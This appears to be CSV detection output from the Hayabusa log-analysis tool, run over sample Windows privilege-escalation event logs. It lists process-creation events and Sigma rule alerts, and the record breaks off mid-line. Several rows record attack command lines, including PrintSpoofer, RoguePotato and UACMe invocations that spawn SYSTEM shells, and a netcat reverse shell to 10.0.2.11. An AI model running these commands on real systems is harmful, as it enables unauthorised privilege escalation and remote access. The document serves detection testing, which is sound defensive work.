C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as 
SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named 
Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
